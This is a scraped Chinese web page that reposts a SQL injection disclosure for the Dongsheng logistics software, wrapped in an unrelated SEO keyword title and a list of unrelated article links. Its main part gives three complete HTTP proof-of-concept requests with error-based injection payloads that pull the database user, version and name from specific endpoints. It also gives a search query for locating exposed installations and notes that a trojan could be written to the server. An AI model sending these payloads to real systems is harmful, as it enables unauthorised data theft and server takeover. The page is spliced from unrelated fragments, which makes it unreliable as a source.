当前位置: 首页 > news >正文

dede做电影网站微信公众号制作模板免费

dede做电影网站,微信公众号制作模板免费,安阳区号12345,人力外包公司有哪些0x01 产品简介 东胜物流软件是一款致力于为客户提供IT支撑的 SOP, 帮助客户大幅提高工作效率,降低各个环节潜在风险的物流软件。 0x02 漏洞概述 东胜物流软件 TCodeVoynoAdapter.aspx、/TruckMng/MsWlDriver/GetDataList、/MvcShipping/MsBaseInfo/Sav…

0x01 产品简介

 东胜物流软件是一款致力于为客户提供IT支撑的 SOP, 帮助客户大幅提高工作效率,降低各个环节潜在风险的物流软件。

0x02 漏洞概述

东胜物流软件 TCodeVoynoAdapter.aspx、/TruckMng/MsWlDriver/GetDataList、/MvcShipping/MsBaseInfo/SaveUserQuerySetting等接口处存在 SQL 注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 复现环境

微步资产测绘:app=东胜物流软件

0x04 漏洞复现 

PoC-1

GET /FeeCodes/TCodeVoynoAdapter.aspx?mask=0&pos=0&strVESSEL=1%27+and+user+%3E0%3B-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

查询当前用户

PoC-2 

GET /TruckMng/MsWlDriver/GetDataList?_dc=1665626804091&start=0&limit=30&sort=&condition=123+IN+(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2bCHAR(32)%2b(select+%40%40version)%2bCHAR(32)%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113))--%20&page=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

查询数据库版本

PoC-3

POST /MvcShipping/MsBaseInfo/SaveUserQuerySetting HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15formname=MsRptSaleBalProfitShareIndex'+AND+2523+IN+(SELECT+(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2b(SELECT+SUBSTRING((ISNULL(CAST((+db_name%28%29)+AS+NVARCHAR(4000)),CHAR(32))),1,1024))%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)))+AND+'uKco'%3d'uKco&isvisible=true&issavevalue=true&querydetail=%7B%22PS_MBLNO%22%3A%22%22%2C%22PS_VESSEL%22%3A%22%22%2C%22PS_VOYNO%22%3A%22%22%2C%22PS_SALE%22%3A%22%5Cu91d1%5Cu78ca%22%2C%22PS_OP%22%3Anull%2C%22PS_EXPDATEBGN%22%3A%222020-02-01%22%2C%22PS_EXPDATEEND%22%3A%222020-02-29%22%2C%22PS_STLDATEBGN%22%3A%22%22%2C%22PS_STLDATEEND%22%3A%22%22%2C%22PS_ACCDATEBGN%22%3A%22%22%2C%22PS_ACCDATEEND%22%3A%22%22%2C%22checkboxfield-1188-inputEl%22%3A%22on%22%2C%22PS_CUSTSERVICE%22%3Anull%2C%22PS_DOC%22%3Anull%2C%22hiddenfield-1206-inputEl%22%3A%22%22%7D}

 查询当前数据库

0x05 修复建议

官方暂未修复该漏洞,请用户联系厂商修复漏洞:http://www.dongshengsoft.com/

部署Web应用防火墙,对数据库操作进行监控。

如非必要,禁止公网访问该系统。

 

http://www.yayakq.cn/news/12570/

相关文章:

  • 网站查询 工信部英文自助建站
  • 赣州网站建设开发自己做的网站加载慢
  • 建站平台网网站建设知识点的总结
  • 网络域名的网站越南注册公司全攻略
  • 江苏同隆建设集团有限公司网站广西南宁最新消息新闻
  • 网站排名带照片怎么做凡科快图免费
  • 微信网站开场动画南昌seo网站
  • 网站建设文案怎么设计wordpress基于什么意思
  • 网站设计与平面设计区别wordpress站点制作
  • 营销型企业网站系统模板下载广州番禺区地图高清版大图
  • 上海装修公司排名十强seo网站平台
  • 高明专业网站建设哪家好新闻10 30字
  • 重庆网站建设网络推广app设计原理
  • 虹口网站开发旅游宣传推广方案
  • 荷泽网站建设中国书画画廊网站模板
  • wordpress企业站主题哪个好合肥建设干部学校网站首页
  • 个人博客网站需要备案吗海口仿站定制模板建站
  • 做接口自动化是网站登录加密网站出现乱码
  • 成都网站建设推广港哥建设通会员多少钱一个月
  • 网站开发文档包括小程序开发平台源代码下载
  • 佛山 做网站公司有哪些百度精准营销获客平台
  • 如何跟进psd做网站wordpress宝塔
  • 高台县建设局网站域名是什么
  • 企业网站模板cms个人网站备案 导航
  • 想做电商网站运营要怎么做win7 iis部署网站
  • 网站seo分析常用的工具是店铺设计叫什么
  • 做关于手机的网站 该如何设计网络规划设计师报考多少钱
  • 长沙o2o网站制作公司做宣传用什么网站好
  • 做有奖竞猜网站违法吗怎么创建免费网站吗
  • 素材网站下载北京外贸网站建设公司